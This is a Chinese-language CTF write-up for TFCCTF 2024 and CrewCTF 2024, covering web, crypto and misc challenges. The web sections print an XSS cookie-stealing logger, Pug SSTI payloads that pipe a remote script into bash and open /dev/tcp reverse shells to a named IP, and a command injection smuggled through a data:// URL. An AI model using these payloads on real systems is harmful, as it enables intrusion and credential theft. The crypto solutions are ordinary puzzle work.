TFCCTF2024&CrewCTF2024

TFCCTF

https://ctf.thefewchosen.com

Web

GREETINGS

一开始感觉可以xss，因为body标签可以用

<body onload=alert(`ls`);>

然后，在vps上放置一个xss.php

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

<body onload="window.location.href='http://8.138.168.65/xss.php?cookie='+document.cookie">
一试，没鬼用，莫得反应，那就不是xss喽

群里的师傅做出来了，Orz，是pug ssti，一开始也注意到了X-Powered-By: Express，Express是node.js的Web框架的一种，而Express框架中最常用的两个视图引擎是Pug和EJS，这个确实没怎么接触

测试发现%23{7*7}，可以被解析为49，确定为pug ssti
师傅给了一篇参考文章
https://www.hackingloops.com/ssti-in-pug/

payload大全
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#pugjs-nodejs

%23{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 8.138.168.65:443/bash.html | bash')}()}

%23{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('bash -c "bash -i >& /dev/tcp/8.138.168.65/443 0>&1"')}()}

payload1，在自己的vps的/var/www/html，新建了bash.html，内容为bash -i >& /dev/tcp/8.138.168.65/443 0>&1
前提是你的vps部署了部署LNMP环境(我的是阿里云ESC)，可参考官方文档https://help.aliyun.com/zh/ecs/use-cases/build-an-lnmp-stack-on-a-ubuntu-instance?spm=a2c4g.11186623.0.i5#prereq-ljy-05c-i3m

如果你的配置和我一样，请注意上图，要把php7.4-fpm.sock，改为php8.1-fpm.sock，反正我什么步骤都没错，就这里看漏眼了，没改，因为我们后面安装php的时候，安装的是php8.1，而Nginx默认的配置文件显示的是7.4

然后，payload2的情况

不知道哪里出问题了

然后，反弹shell，也有免费的vps，具体使用体验我不清楚，反正我是自费的

https://cat.flag.sh
http://ceye.io/

SAFE_CONTENT

源码

<?php
    function isAllowedIP($url, $allowedHost) {
        $parsedUrl = parse_url($url);        
        if (!$parsedUrl || !isset($parsedUrl['host'])) {
            return false;
        }        
        return $parsedUrl['host'] === $allowedHost;
    }
    function fetchContent($url) {
        $context = stream_context_create([
            'http' => [
                'timeout' => 5 // Timeout in seconds
            ]
        ]);
        $content = @file_get_contents($url, false, $context);
        if ($content === FALSE) {
            $error = error_get_last();
            throw new Exception("Unable to fetch content from the URL. Error: " . $error['message']);
        }
        return base64_decode($content);
    }
    if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['url'])) {
        $url = $_GET['url'];
        $allowedIP = 'localhost';       
        if (isAllowedIP($url, $allowedIP)) {
            $content = fetchContent($url);
            // file upload removed due to security issues
            if ($content) {
                $command = 'echo ' . $content . ' | base64 > /tmp/' . date('YmdHis') . '.tfc';
                exec($command . ' > /dev/null 2>&1');
                // this should fix it
            }
        }
    }
    ?>

关注到这个

$content = fetchContent($url);
$command = 'echo ' . $content . ' | base64 > /tmp/' . date('YmdHis') . '.tfc';
exec($command . ' > /dev/null 2>&1');

exec函数无回显，有echo通过反引号实现命令执行，我们可以直接反弹shell

还有这个

function fetchContent($url) {
        $context = stream_context_create([
            'http' => [
                'timeout' => 5 // Timeout in seconds
            ]
        ]);
        $content = @file_get_contents($url, false, $context);
        if ($content === FALSE) {
            $error = error_get_last();
            throw new Exception("Unable to fetch content from the URL. Error: " . $error['message']);
        }
        return base64_decode($content);
    }

说明$content的内容需要经过base64编码

And this

function isAllowedIP($url, $allowedHost) {
        $parsedUrl = parse_url($url);        
        if (!$parsedUrl || !isset($parsedUrl['host'])) {
            return false;
        }        
        return $parsedUrl['host'] === $allowedHost;
    }

parse_url — 解析 URL，返回其组成部分，$allowedIP = 'localhost';说明$url的域名要等于localhost

有不少关于它绕过的介绍，https://www.cnblogs.com/Lee-404/p/12826352.html

有这样的形式://localhost，我们很容易想到php伪协议中的，data://text/plain,xxx

于是有了下面的payload，原来还能data://localhost/text/plain这样用，学到了

`bash -c 'bash -i >& /dev/tcp/8.138.168.65/443 0>&1'`

/?url=data://localhost/text/plain,payload，payload是上面base64编码后的结果

Crypto

CCCCC

5c4c4c6c4c3c4c3c5c4c4c6c7cbc6c3c7c3c6c8c6cfc7c5c7c4c5cfc6c3c6cfc7c5c7c4c5cfc6c3c7c4c3c0c5cfc6c3c6cdc7c9c5cfc6c3c6c2c3c0c7c9c5cfc6c3c3c4c6cec6c4c5cfc6c3c6cdc7c9c5cfc6c3c6c4c6cfc6c7c5cfc6c3c6c1c6cec6c4c5cfc6c3c6cdc7c9c5cfc6c3c6c3c3c4c3c7c7cdc0ca
很像16进制，但每两位都是以c结尾，把c去掉试试
5446434354467b6373686f75745f636f75745f6374305f636d795f636230795f63346e645f636d795f63646f675f63616e645f636d795f636334377d0a
得到TFCCTF{cshout_cout_ct0_cmy_cb0y_c4nd_cmy_cdog_cand_cmy_cc47}

GENETICS

CCCA CACG CAAT CAAT CCCA CACG CTGT ATAC CCTT CTCT ATAC CGTA CGTA CCTT CGCT ATAT CTCA CCTT CTCA CGGA ATAC CTAT CCTT ATCA CTAT CCTT ATCA CCTT CTCA ATCA CTCA CTCA ATAA ATAA CCTT CCCG ATAT CTAG CTGC CCTT CTAT ATAA ATAA CGTG CTTC

CCCACACGCAATCAATCCCACACGCTGTATACCCTTCTCTATACCGTACGTACCTTCGCTATATCTCACCTTCTCACGGAATACCTATCCTTATCACTATCCTTATCACCTTCTCAATCACTCACTCAATAAATAACCTTCCCGATATCTAGCTGCCCTTCTATATAAATAACGTGCTTC

去掉空格，随波逐流，或者ToolsFx三位一组解密
vezdq2rgEZfFDZfSBf0Nm4rFDgGXC291C291x4q1DhqWmf0wm4j6x4mWmg60
发现解不出来，md，真的工具用多了，下次再也不梭了

这次记住了，ACGT，作为一个物化地选手，老是记得是ATCG，觉得好顺口

s = 'CCCA CACG CAAT CAAT CCCA CACG CTGT ATAC CCTT CTCT ATAC CGTA CGTA CCTT CGCT ATAT CTCA CCTT CTCA CGGA ATAC CTAT CCTT ATCA CTAT CCTT ATCA CCTT CTCA ATCA CTCA CTCA ATAA ATAA CCTT CCCG ATAT CTAG CTGC CCTT CTAT ATAA ATAA CGTG CTTC'
dict = {'A': '00', 'C': '01', 'G': '10', 'T': '11', ' ': ''}
flag = ''
for i in s:
    flag += dict[i]
for i in range(0, len(flag), 8):
    print(chr(int(flag[i:i+8], 2)), end='')

CONWAY

from secret import generate_next_key, flag
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

initial = 11131221131211131231121113112221121321132132211331222113112211

initial = generate_next_key(initial)
print(initial)

initial = generate_next_key(initial)
h = hashlib.sha256()
h.update(str(initial).encode())
key = h.digest()

cipher = AES.new(key, AES.MODE_ECB)
print(cipher.encrypt(pad(flag.encode(),16)).hex())

# 311311222113111231131112132112311321322112111312211312111322212311322113212221
# f143845f3c4d9ad024ac8f76592352127651ff4d8c35e48ca9337422a0d7f20ec0c2baf530695c150efff20bbc17ca4c

conway Sequences，康威序列，我们需要找题目所给的下一个

import hashlib
from Crypto.Cipher import AES
from Crypto.Util.number import *

initial = 132113213221133112132113311211131221121321131211132221123113112221131112311332111213211322211312113211
h = hashlib.sha256()
h.update(str(initial).encode())
key = h.digest()
cipher = AES.new(key, AES.MODE_ECB)
enc = 0xf143845f3c4d9ad024ac8f76592352127651ff4d8c35e48ca9337422a0d7f20ec0c2baf530695c150efff20bbc17ca4c
print(cipher.decrypt(long_to_bytes(enc)))

Misc

RULES

DISCORD SHENANIGANS V4

机器人说了flag就在这里，但是你直接复制它的话是没有反应的
选择右键复制，即可得到

I'm sure it's here somewhere. ||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​|| _ _ _ _ _ _  add this to the format: zoo_wee_mama

TFCCTF{zoo_wee_mama}

CrewCTF

https://2024.crewc.tf/challenges

Web

Malkonkordo()

一个Markdown编辑器，可以看到渲染内容
但是用Rust写的。。。做牛魔

Crypto

4ES

题目

#!/usr/bin/env python3
from hashlib import sha256
from random import choices
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
with open('flag.txt', 'rb') as f:
    FLAG = f.read().strip()
chars = b'crew_AES*4=$!?'
L = 3
w, x, y, z = (
    bytes(choices(chars, k=L)),
    bytes(choices(chars, k=L)),
    bytes(choices(chars, k=L)),
    bytes(choices(chars, k=L)),
)
k1 = sha256(w).digest()
k2 = sha256(x).digest()
k3 = sha256(y).digest()
k4 = sha256(z).digest()
print(w.decode(), x.decode(), y.decode(), z.decode())
pt = b'AES_AES_AES_AES!'
ct = AES.new(k4, AES.MODE_ECB).encrypt(
         AES.new(k3, AES.MODE_ECB).encrypt(
             AES.new(k2, AES.MODE_ECB).encrypt(
                 AES.new(k1, AES.MODE_ECB).encrypt(
                     pt
                 )
             )
         )
     )
key = sha256(w + x + y + z).digest()
enc_flag = AES.new(key, AES.MODE_ECB).encrypt(pad(FLAG, AES.block_size))
with open('output.txt', 'w') as f:
    f.write(f'pt = {pt.hex()}\nct = {ct.hex()}\nenc_flag = {enc_flag.hex()}')

一开始无脑选择了直接爆破，总结果$14^{12}=56693912375296$，淦，时间上要跑很久，而且中途我还断了几次
后面有师傅做出来了，一看中间相遇攻击，好家伙，很熟悉但自己没搞过
一搜，还真发现跟二重DES的情况类似，也是适用于中间相遇攻击，空间换时间
$ct=E_{k4}(E_{k3}(E_{k2}(E_{k1}(pt))))$
$pt=D_{k1}(D_{k2}(D_{k3}(D_{k4}(ct))))$
$E_{k2}(E_{k1}(pt))=D_{k3}(D_{k4}(ct))$
相关介绍
https://www.cnblogs.com/weikunpeng/p/14231224.html
https://ctf-wiki.org/crypto/attack-summary/meet-in-the-middle/

from Crypto.Util.number import *
from hashlib import sha256
from Crypto.Cipher import AES
import itertools
from time import *

start = time()
print(f'[+] start')
c = 0xedb43249be0d7a4620b9b876315eb430
enc_flag = 0xe5218894e05e14eb7cc27dc2aeed10245bfa4426489125a55e82a3d81a15d18afd152d6c51a7024f05e15e1527afa84b
c = long_to_bytes(c)
enc_flag = long_to_bytes(enc_flag)
p = b'AES_AES_AES_AES!'
chars = 'crew_AES*4=$!?'
key = []
combinations = list(itertools.product(chars, repeat=3))
list = []
for combo in combinations:
    list.append(''.join(combo).encode())
length = len(list)**2
E_k2_k1_p = []
for k1 in list:
    for k2 in list:
        key1 = sha256(k1).digest()
        key2 = sha256(k2).digest()
        E_k2_k1_p.append(AES.new(key2, AES.MODE_ECB).encrypt(
            AES.new(key1, AES.MODE_ECB).encrypt(p)))
        key.append(k1+k2)
print('[+] E_k2_k1_p finished')
set1 = set(E_k2_k1_p)
D_k3_k4_c = []
for k3 in list:
    for k4 in list:
        key3 = sha256(k3).digest()
        key4 = sha256(k4).digest()
        D_k3_k4_c.append(AES.new(key3, AES.MODE_ECB).decrypt(
            AES.new(key4, AES.MODE_ECB).decrypt(c)))
        key.append(k3+k4)
set2 = set(D_k3_k4_c)
res = set1 & set2
print('[+] D_k3_k4_c finished')
res = res.pop()
print(f'[+] res = {res}')
enc_key = []
enc_key.append(key[E_k2_k1_p.index(res)])
enc_key.append(key[length+D_k3_k4_c.index(res)])
enc_key = sha256(b"".join(enc_key)).digest()
print(AES.new(enc_key, AES.MODE_ECB).decrypt(enc_flag))
end = time()
print(f'[+] end')
print(f'[+] time = {end-start}')

[+] start
[+] E_k2_k1_p finished
[+] D_k3_k4_c finished
[+] res = b'\xb7\xe25\x0c\xa5N\xban;\xf1\xd7\xa5Cn\xf85'
b'crew{m1tm_at74cK_1s_g0lD_4nd_py7h0n_i5_sl0w!!}\x02\x02'
[+] end
[+] time = 196.34752559661865

Read between the lines

题目

#!/usr/bin/env python3
from random import shuffle
from Crypto.Util.number import getPrime
with open('flag.txt', 'rb') as f:
    FLAG = f.read().strip()
assert len(FLAG) < 100
encoded_flag = []
for i, b in enumerate(FLAG):
    encoded_flag.extend([i + 0x1337] * b)
shuffle(encoded_flag)
e = 65537
p, q = getPrime(1024), getPrime(1024)
n = p * q
c = sum(pow(m, e, n) for m in encoded_flag) % n
with open('output.txt', 'w') as f:
    f.write(f'{n = }\n{e = }\n{c = }\n')

注意extend跟append是不一样的，这里是表示的是一维数组

$c\equiv \sum FLAG[i]*(0x1337+i)^{e}mod\ n$

然后，构造格

$$\left [ \begin{matrix} (0x1337)^{e}mod\ n&(0x1337+1)^{e}mod\ n&...&(0x1337+i)^{e}mod\ n&n&-c\\ 1\\ 0&1\\ ...\\ 0&0&0&0&0&L \end{matrix} \right ] * \left [ \begin{matrix} b0\\ b1\\ ...\\ k\\ 1 \end{matrix} \right ] \ = \left [ \begin{matrix} 0\\ b0\\ b1\\ ...\\ k\\ L \end{matrix} \right ]$$

k的数量级未知，这里我们用L来平衡目标向量，这里系数向量我们用的是列向量，所以这里需先转置再LLL

# sage
from Crypto.Util.number import *
n = 11570808501273498927205104472079357777144397783547577003261915477370622451850206651910891120280656785986131452685491947610185604965099812695724757402859475642728712507339243719470339385360489167163917896790337311025010411472770004154699635694228288241644459059047022175803135613130088955955784304814651652968093606122165353931816218399854348992145474578604378450397120697338449008564443654507099674564425806985914764451503302534957447420607432031160777343573246284259196721263134079273058943290282037058625166146116257062155250082518648908934265839606175181213963034023613042840174068936799861096078962793675747202733
e = 65537
c = 7173375037180308812692773050925111800516611450262181376565814072240874778848184114081029784942289615261118103256642605595499455054072839201835361613983341298973366881719999836078559255521052298848572778824157749016705221745378832156499718149327219324078487796923208917482260462508048311400560933782289383624341257636666638574026084246212442527379161504510054689077339758167386002420794571246577662116285770044542212097174474572856621921237686119958817024794843805169504594110217925148205714768001753113572920225449523882995273988088672624172009740852821725803438069557080740459068347366098974487213070886509931010623
M = Matrix(ZZ,102,102)
m_i = [pow(0x1337 + i, e, n) for i in range(100)]
L = 2**20
for i in range(100):
    M[0,i] = m_i[i]
    M[i+1,i] = 1
M[0,-2] = n
M[0,-1] = -c
M[-2,-2] = 1
M[-1,-1] = L
res = M.T.LLL()[-1]
if res[-1] == L:
    for i in res[1:100]:
        print(chr(abs(i)),end='')
# crew{D1d_y0u_3xp3cT_LLL_t0_b3_h1Dd3n_b3tw3en_th3_l1n3s???}

$$\left [ \begin{matrix} b0&b1&...&bi&-1&k \end{matrix} \right ] * \left [ \begin{matrix} 1&...&...&...&...&(0x1337)^{e}mod\ n\\ 0&1&...&...&...&(0x1337+1)^{e}mod\ n\\ 0&0&1&...&...&(0x1337+i)^{e}mod\ n\\ 0&0&0&...&1&c\\ 0&0&0&...&0&n\\ \end{matrix} \right ] \ = \left [ \begin{matrix} b0&b1&...&bi&-1&0 \end{matrix} \right ]$$

这里就不需要平衡目标向量了

# sage
M=matrix(ZZ,102,102)
for i in range(102):
    M[i,i]=1

M[-1,-1]=n
M[-2,-1]=c
for i in range(100):
    M[i,-1]=pow(0x1337+i,e,n)
res=M.LLL()[0]
for i in res[:100]:
    print(chr(abs(i)),end="")

Misc

这个比赛的杂项，不好评价。。。反正不适合我